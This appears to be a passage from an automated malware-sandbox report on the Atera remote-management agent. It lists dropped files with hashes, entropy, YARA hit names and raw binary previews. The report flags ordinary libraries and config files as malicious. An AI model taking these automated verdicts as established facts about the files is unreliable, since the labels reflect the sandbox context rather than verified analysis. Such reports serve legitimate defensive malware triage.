                                                                                                                                                                                                                                                                                              SHA-512:8D25CB5982E2D8A5EFA0056C120E1BD5AEC7E28DE4DEEC9BFA2BAEBFB0FABDC4A12369F901C8415CDD3402C9A0E8F8F338C1C5E3FEB1A2C0F45ED446AB80701B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0............" ..0..J...........h... ........... ..............................d.....`..................................g..O....................T..0(...........f..T............................................ ............... ..H............text...4I... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B.................h......H.......L...............<^.. ...\f........................................{'...*:.((.....}'...*..0..#........u......,.()....{'....{'...o*...*.*v ..yN )UU.Z()....{'...o+...X*....0..:........r...p......%..{'......%q.........-.&.+.......o,....(-...*..{....*:.((.....}....*....0..#........u......,.()....{.....{....o*...*.*v ..:. )UU.Z()....{....o+...X*....0..:........r-..p......%..{.......%q.........-.&.+.......o,....(-...*..{/...*..{0...*V.((.....}/.....}0...*.0..;........u......

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Memory.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):138288
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.18032959054322
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:g3XFz0qjCIPMAxlUXUKoPfw0kG71AHK7cnJ:S0qjCSRE+fw0kG71S
                                                                                                                                                                                                                                                                                              MD5:CC3FFADF699BFB7F10A176AE306707E8
                                                                                                                                                                                                                                                                                              SHA1:C0824E4E57FEBEF32E904E540BA369BB77ACD15A
                                                                                                                                                                                                                                                                                              SHA-256:D48B4C4D3BED0F4662B98E557A0EDE24B6C3745E7BFFC114164A2FD33D947904
                                                                                                                                                                                                                                                                                              SHA-512:BC648768FA54D6F9A0FB70CE88960EE2137712FD7056F8FF28D2E222871D2FFA96B97C81E21D84CD71EA336F29D28977EAB57D858B2B7D1D7C7B2B01BB455C32
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6wb.........." ..0.................. ... ....... .......................`...........@.................................?...O.... ..@...............0(...@..........8............................................ ............... ..H............text...h.... ...................... ..`.rsrc...@.... ......................@..@.reloc.......@......................@..B................s.......H........ ..............\.......D.........................................(&...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....('...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o(....{....(X...*..(....zN........o)...s*...*.(....z.s+...*..(....zF(L....(F...s,...*.(....z.(M...s,...*.(....z.s-...*.(....z.s....*..(....zN........o)...s/...*.(....zrr...p(S....c.I...(F...s0...*.(....zBr...p(P...s0...*.(....z.s1...*.(....z.(O...s2...*.(!...z.(V...s2...*.(#...z

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):17968
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.672454142602205
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Nh06sbbVVPWU2W+Nyb8E9VF6IYinAM+oCeB7f5DxmX:Ny9eEpYinAMxCA7xDxmX
                                                                                                                                                                                                                                                                                              MD5:2BBEC1A6C6C64499CE0A4EDEA5D0C629
                                                                                                                                                                                                                                                                                              SHA1:A1C39059B887B7A1BDF93CAB3237413D5948BE26
                                                                                                                                                                                                                                                                                              SHA-256:D80E6D1C2A0850A2FDCA5F16A259130B08DDFE968CDC137253221CD4600D53CA
                                                                                                                                                                                                                                                                                              SHA-512:B27639E9D30FD23461723708D4067C99AA3162FD8EF935AD5DA75776EBB46F2D11BD0FCA211BE35A195CE3020E10E063F66FDDDEAC0624392143B856DC23C174
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................3... ...@....@.. ..............................q.....@.................................@3..K....@..................0(...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p3......H........$..0...................P ......................................._.%c......=.n')...(v..:}.d...3...B...).. .:Q(....L.jt....}Xv.b7y0r.[..$.....q..c.6.....p..2..qHv/.pb.=..9.o"z.. 0P.t%H....U...0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0..........*....0................*..0...............*...0..............

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation.zip

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):384561
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999363646163921
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:6144:Dyg677hm03WpEpp2/8LWX+Kh9o3zYerEz7MLHIqbsauawNMGRSManfY+bcQ/lqNl:Dyf7hm03Ls/OWVh9oMaEz76zwfEHY+lM
                                                                                                                                                                                                                                                                                              MD5:698975AE4AB57FED99CC170DAB8A3E36
                                                                                                                                                                                                                                                                                              SHA1:04B0067BF8584F9D41EF156F75FE28982BFB1286
                                                                                                                                                                                                                                                                                              SHA-256:20FFBCF807587C9A0B13C46406B52927BF0A9965EFE12DB25FCB729E6F1CE7B7
                                                                                                                                                                                                                                                                                              SHA-512:172E65C7657D1FE250AEAF422230C104D03F16356AA32D7B1077ABDD558B69AC4F4F434FA551117AF1CF6FDB74364237E50EF693B2F4201C8475439B6DE77AA6
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:PK..-......F%Z............=...AgentPackageAgentInformation/AgentPackageAgentInformation.exe....(.................O.3..%.Y~......{.....#.8-eG{AT.3.@.g.=1.q[....l].l9y@..2&.}K..t.EH$...uS.+.`=xz._3.fcq..NK... oU.t...1^..c.m..;..w.&....M.......RL.,........M.G.}....e....."..0.N..D?.\q..>.2....pv.(^...."..q..F...?.B4..v.6..K_-t....)Cr....C...K.QD.....3...g..Z1.2VV..L.l...0.U..M.'F:]Z.."...jL.../...U.v.....{.tU.~.......l.aA;.....2.l.F.8"...><t..lTr.'..ce.`dSp.$.l...].. .X..7@.+..0....;0..c..J..C...kb....s.Q{O.Wts...)..N...%..T...q...oo.F..;7v.h....5m...B...:8^n..+..v...N.\...3.D..zI..\...Q>S...!E...e.:.3........m.(@BO.._k..{.....E."..T.7.l....+=-..xO..I0.x..#......9....^.`..cy.*0Q}>.b..H.l..x.M..l.jS...~...L."q..9".....e..1.'......J..P.D.}...O....h$./..Z_...K....J..../...?...b....:.._.?.7..s....O.X@.....J*7..".....A.............r;..<..g8..:.p.'X.[.........5tE+Z}p...4...~.&...W."....2.2......y(...e...A....[..x..5..:H..S.i..`&.t.&.l-..:..!.y..}.q.....Z}6...0.M

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):186408
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.7421661476686365
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:QPF+XpxWhiIx4oCIXLGRlsZuPfzh554bD0CJd4bDgoVBLv:UM5ohiQ4DIXLG3sZuaD0dDN
                                                                                                                                                                                                                                                                                              MD5:9D8D50D2789C2A8D847D7953518A96F6
                                                                                                                                                                                                                                                                                              SHA1:42621852B40F3F068DA5494C9879F846B4869399
                                                                                                                                                                                                                                                                                              SHA-256:76AEFE9205BCE78D4533500E6839E892B7D80EDC39ABCD30CA67952925302B29
                                                                                                                                                                                                                                                                                              SHA-512:91EA7152762F00FDFBC6CB8D5D15C2E07BC298AF8958406B0B0FB652EE3D4A4DA9D79CA7DDE47DC7700285B20CBA089F35745C2B3B84B9DC0D258BD9BDC89F56
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Gzg.........."...0.............b.... ........@.. ....................... ......eA....`.....................................O.......................((........................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................D.......H...........0.......,....................................................0..........r...p... .....r...p.(.....o......(.....o......(.....o...........s......[o .....s!...%.o".......o#.....s$..........s%...%......io&...%o'.....o(.......o)...o).....(*...*..0..........r...p... .....r...p.(.....o......(.....o.......(+..........s......[o .....s!...%.o".......o,.......s-..........s%......i.m.....%......io........o)...o)...(.........o/...*..(0...*..{....*"..}....*..{....*"..}....*..{.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):546
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.048902065665432
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:MMHdG3VSQg9LNFF7ap+5v5OXrRf/2//FicYo4xm:JdASPF7NhOXrRH2/d9r
                                                                                                                                                                                                                                                                                              MD5:158FB7D9323C6CE69D4FCE11486A40A1
                                                                                                                                                                                                                                                                                              SHA1:29AB26F5728F6BA6F0E5636BF47149BD9851F532
                                                                                                                                                                                                                                                                                              SHA-256:5E38EF232F42F9B0474F8CE937A478200F7A8926B90E45CB375FFDA339EC3C21
                                                                                                                                                                                                                                                                                              SHA-512:7EEFCC5E65AB4110655E71BC282587E88242C15292D9C670885F0DAAE30FA19A4B059390EB8E934607B8B14105E3E25D7C5C1B926B6F93BDD40CBD284AAA3CEB
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>...<supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.ini

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):12
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.418295834054489
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhWTn:WKn
                                                                                                                                                                                                                                                                                              MD5:3FA173E4E1E00396A06E409935A1E7F9
                                                                                                                                                                                                                                                                                              SHA1:089B85E04C266EDD6DBB678EE91DA656B19674B3
                                                                                                                                                                                                                                                                                              SHA-256:297A53DB6DA22AA3EE4CE849C9952F08BB7296303A170C9DDC7ACEDE10B64C25
                                                                                                                                                                                                                                                                                              SHA-512:D0C34B51E5599C01EDF4CA6ACC89186BCEA5B97A598C4F120B3063C171B9A1668BA5FF87014565360471973B30733A5521783FA3446BF376332AAD23A4325D26
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=38.8

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):96808
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.18015175056516
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:EJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJG/50vks00UfgfgvO1762C:EQUm2H5KTfOLgxFJjE50vksVUfPvO14
                                                                                                                                                                                                                                                                                              MD5:93D5E2AAFBE16CADA057BF880002B2F7
                                                                                                                                                                                                                                                                                              SHA1:095832AFB05852D692BD40D5F77EBBDD339BC545
                                                                                                                                                                                                                                                                                              SHA-256:83333CE938E943AC54EA0428722D8F9D64D2BE993502CD0E95B39E2D78956484
                                                                                                                                                                                                                                                                                              SHA-512:2E2391C315FD173634F262011A25C9E397BC8A1DAC8E86A039F52FF733534F57F2E00ADC995900823448A45933864E814E89549F41271FC9D7EFFD116BBF3854
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0.d.........." ..0..H..........zf... ........... ....................................`.................................(f..O.......8............R..((...........d............................................... ............... ..H............text....F... ...H.................. ..`.rsrc...8............J..............@..@.reloc...............P..............@..B................\f......H........k..D............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):704552
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.9539626583477325
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:79BzaPm657wqehcZBLX+HK+kPJUQEKx07N0TCBGiBCjC0PDgM5j9FKjc3S:78m657w6ZBLmkitKqBCjC0PDgM5i
                                                                                                                                                                                                                                                                                              MD5:50E3F5A0E04CBD99D4BE8CFE914C7BBE
                                                                                                                                                                                                                                                                                              SHA1:19D99AE964F490E055942D516C60DFDEDC585825
                                                                                                                                                                                                                                                                                              SHA-256:89ED8CBC24723D67AC7E47D0D018EA293F15FC210D9B3E26DC555F464E9B15CD
                                                                                                                                                                                                                                                                                              SHA-512:2F67DBB41631B6134414D1685815DAEA7F38120D88F83CB8F83763CF18B1F6AA2B9A5A7EAEF816EB8A24998536556128C15128B4E301B765C859A9741D69BA25
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ........... ....................................`.....................................O.......................((.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........{...,..................d.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X.+....b...aX...X...2.....cY.....cY....cY...{...._..{........+,..{^....3...{]......(....,...{]...*..{_.......-..*...0...........-.r...ps....z.o......-.~....*.~....X...+....b..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\dynamicfieldscaching.cch

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.649241268222702
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:hsShKF4MsShLP6SX9NfzyShaKf0OVCGShaKf0Od:m4qBX9Nf1VCd
                                                                                                                                                                                                                                                                                              MD5:B7471135FE1C0CA5A1BAA1F2B47FFA1D
                                                                                                                                                                                                                                                                                              SHA1:963231DCA14C3598FB46B0674624A9F2F2B0376F
                                                                                                                                                                                                                                                                                              SHA-256:38B149725143E00E4EC4A21EBC96CB8CFB2A160F01CA7D4B25983F51413303B6
                                                                                                                                                                                                                                                                                              SHA-512:5F45B37CB165B57D9D39522BC90708AF98C162148EC02A0F4595D182C3AFCCD41760A8A2B170997A6EEB1E6F1A7BF31ACDF7B37FCBA845AC547E031999B33181
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:......................TAgentPackageAgentInformation, Version=38.8.0.0, Culture=neutral, PublicKeyToken=null.....6AgentPackageAgentInformation.Cache.CachedDynamicFields.....<DynamicFields>k__BackingField.<Timestamp>k__BackingField..JAgentPackageAgentInformation.Api.Information.CustomField.DynamicFieldDto[]...............\.I..H...............HAgentPackageAgentInformation.Api.Information.CustomField.DynamicFieldDto................................................................................................

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\information.cch

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):35
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.8645783739023822
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:GBjyXgBkHRcry:6jTBkHRcu
                                                                                                                                                                                                                                                                                              MD5:6262109EBA7667FE48248BCCAD76C409
                                                                                                                                                                                                                                                                                              SHA1:52265059C2B0CC3BA11CD831DDE6100E53B9AA13
                                                                                                                                                                                                                                                                                              SHA-256:46B7C6D1EC55444FB24801F4D836ADD340C57A591E5DE786F2A35E8DB1C7E26E
                                                                                                                                                                                                                                                                                              SHA-512:EF990E4C477F1490F4EA1B9149375C89909A0577B47EED1FCD69C91941030DA9BB499AB6984AB42C5F56FB3BB4ABAEF1CF59094E3513681A7EF063C750ECC601
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.626538F84035EC580EF82A256E496B41

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\update.cch

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):35
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.677028119136097
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:fc3Gh7UgzVchXn:f7NUgWn
                                                                                                                                                                                                                                                                                              MD5:E49A5284D2F384905389D53944708C48
                                                                                                                                                                                                                                                                                              SHA1:E455420E95EA0246B8B63A251B0E451ACD711B28
                                                                                                                                                                                                                                                                                              SHA-256:33FD3B161AEC8867652C6B0707180ADC42C267EE9F66E33BF0CE70B55B4660B9
                                                                                                                                                                                                                                                                                              SHA-512:E9EC60296F38F68EB6C6233094E50EF534CE44A91E6511097158D631673017F8FE316E1C11A494C29BD8BE6F94AAFBF9F4A9546E709694BD3CC98B12CD243FF4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.2E69DDAE9D0D04A8ED39EECA359A9772

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat.zip

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):310624
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999405219212172
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:6144:EQjapzpRU64iYUQf9N4E/xWTUugwXWBoJW55fJKsff+Idm3lqd0LNIN5:EUaBXU5BjfcE5WTkwGRfQY+Om3lqdvL
                                                                                                                                                                                                                                                                                              MD5:CB8B58765B2386EC38F32F17C7BEFCE9
                                                                                                                                                                                                                                                                                              SHA1:6FF84B9B3884F75A3BAA40E64181AF326A1DB4C5
                                                                                                                                                                                                                                                                                              SHA-256:2FDE849766B928C180458B200E866140C73692245C6AF9080B63992C190E80EE
                                                                                                                                                                                                                                                                                              SHA-512:79D7A4344D1D3F3640D6847B785695F8766DB3A9D1558325B0365FD7FDD2C7AD546B2CFFC8115A4495E22B8B70DB1B845030AF54D26009628E0144F0D8925571
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:PK..-.....'gqX............/...AgentPackageHeartbeat/AgentPackageHeartbeat.exe....0l.......?........F0..6\.q.......<.......I.3. &.;.........O.;d.&.U....".' ..}P..u+0.`g.Z..Zq,...w.1./..UD....F.a...B=.....!.. .=... .#7A.Q..o.........+q.C5 . 1..Ud...R>n..Y.9}>z.....yE7.}!sn....p1(e.....}T#>2/..y*7.@.<..J..q......3.4....M..."/"..cS....9pT.dn.:c...&..,H.e.....r...X#...m...V..ZP......+.h.R. .8.......!7FNa.`.P;.......P~..U.x.K.D8.&.vQ!..xn..~cNG.2._L.},..........:.J...S.y..-J...K.z.H.....z.G.6....d.b.[..9......Q.r.T........#..+..b6<...p.}......!.5.&l.E..4.F8..Y...."/.b.....................(.......b..&.6...t..%.(A..X{....H4....[.....}.......n0.:.......s..wQ.&.J\|j.....7=b+.L.t.l.0.{G.Jb.Jy.U.kG.....p-...^..g.4..RA.R..........~..5t4_...Z...h..J..........t...C3....{K.h...F..W$...U....-55....Hi.......m...............x..........)...F.p....r,}}L...i:q.Y.O....`L......yY...N..J]....T..~_|.Bh..p.w%0.H.%D...p..RM`..e....TJk..(..\.%......4..N.<..^..k/_..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):27696
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.448893455648887
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:TndoS4jOhWCHDIJNQnt96+aTkdMEdcG7UhZPWU1Nyb8E9VF6IYinAM+oC8Z1KTm:Td0SkSeIUhrREpYinAMxCm
                                                                                                                                                                                                                                                                                              MD5:797C9554EC56FD72EBB3F6F6BEF67FB5
                                                                                                                                                                                                                                                                                              SHA1:40AF8F7E72222BA9EC2EA2DD1E42FF51DC2EB1BB
                                                                                                                                                                                                                                                                                              SHA-256:7138B6BEDA7A3F640871E232D93B4307065AB3CD9CFAC1BD7964A6BEC9E60F49
                                                                                                                                                                                                                                                                                              SHA-512:4F461A8A25DA59F47CED0C0DBF59318DDB30C21758037E22BBAA3B03D08FF769BFD1BFC7F43F0E020DF8AE4668355AB4B9E42950DCA25435C2DD3E9A341C4A08
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O............"...0..8...........V... ...`....@.. ....................................`..................................V..O....`..P............D..0(...........U..8............................................ ............... ..H............text....6... ...8.................. ..`.rsrc...P....`.......:..............@..@.reloc...............B..............@..B.................V......H.......t-..x(......2.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. .... )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*.rW..p*.r...p*F.(....r...p( ...*.r...p*.r...p*..(....*.rM..p*.r...p

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):542
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.041389931890446
                                                                                                                                                                                                                                                                                              Encrypted:false
